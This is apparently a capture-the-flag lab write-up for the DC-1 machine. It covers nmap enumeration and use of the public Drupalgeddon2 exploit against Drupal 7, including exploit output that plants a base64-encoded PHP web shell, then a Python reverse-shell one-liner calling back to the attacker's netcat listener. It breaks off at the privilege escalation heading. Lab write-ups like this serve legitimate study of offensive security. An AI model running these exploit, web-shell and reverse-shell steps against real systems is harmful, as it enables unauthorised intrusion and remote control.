Pwned Date - 8th July 2022

Enumeration

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (<http://drupal.org>)
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37524/udp   status
|   100024  1          41595/udp6  status
|   100024  1          52044/tcp   status
|_  100024  1          60318/tcp6  status
52044/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There is a tool called droopescan specialize for scanning CMS websites

https://github.com/SamJoan/droopescan

However after some trial and error I am giving up as current kali is using python3.10

Exploitation

Moving on looking for public exploit and I found this

https://github.com/dreadlocked/Drupalgeddon2

After downloading the script, when I tried to run the script, I got some error:

┌──(kali㉿VirtualBox)-[~]
└─$ wget <https://raw.githubusercontent.com/dreadlocked/Drupalgeddon2/master/drupalgeddon2.rb>

┌──(kali㉿VirtualBox)-[~]
└─$ ruby drupalgeddon2.rb               
<internal:/usr/lib/ruby/vendor_ruby/rubygems/core_ext/kernel_require.rb>:85:in `require': cannot load such file -- highline/import (LoadError)
	from <internal:/usr/lib/ruby/vendor_ruby/rubygems/core_ext/kernel_require.rb>:85:in `require'
	from drupalgeddon2.rb:16:in `<main>'

Simply stackoverflow and solved the issue by running

sudo gem install highline

Finally we can run the script peacefully and we get the shell as user www-data

┌──(kali㉿VirtualBox)-[~]
└─$ ruby drupalgeddon2.rb 192.168.81.193
[*] --==[::# Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : <http://192.168.81.193/>
--------------------------------------------------------------------------------
[!] MISSING: <http://192.168.81.193/CHANGELOG.txt>    (HTTP Response: 404)
[!] MISSING: <http://192.168.81.193/core/CHANGELOG.txt>    (HTTP Response: 404)
[+] Found  : <http://192.168.81.193/includes/bootstrap.inc>    (HTTP Response: 403)
[+] Header : v7 [X-Generator]
[!] MISSING: <http://192.168.81.193/core/includes/bootstrap.inc>    (HTTP Response: 404)
[!] MISSING: <http://192.168.81.193/includes/database.inc>    (HTTP Response: 403)
[+] Found  : <http://192.168.81.193/>    (HTTP Response: 200)
[+] Metatag: v7.x [Generator]
[!] MISSING: <http://192.168.81.193/>    (HTTP Response: 200)
[+] Drupal?: v7.x
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo GYLXAKEI
[+] Result : GYLXAKEI
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (<http://192.168.81.193/shell.php>)
[i] Response: HTTP 404 // Size: 13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl '<http://192.168.81.193/shell.php>' -d 'c=hostname'

DC-1>> whoami
www-data

DC-1>> cat /home/local.txt
ccbae21310b846bfa659298f3eb3d1d6

This shell is very unstable we will call another reverse shell on netcat to continue

Do note that we cannot use character like > so we use python here:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.81",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

┌──(kali㉿VirtualBox)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.49.81] from (UNKNOWN) [192.168.81.193] 37022
www-data@DC-1:/var/www$

Privilege Escalation

Getting SUID by running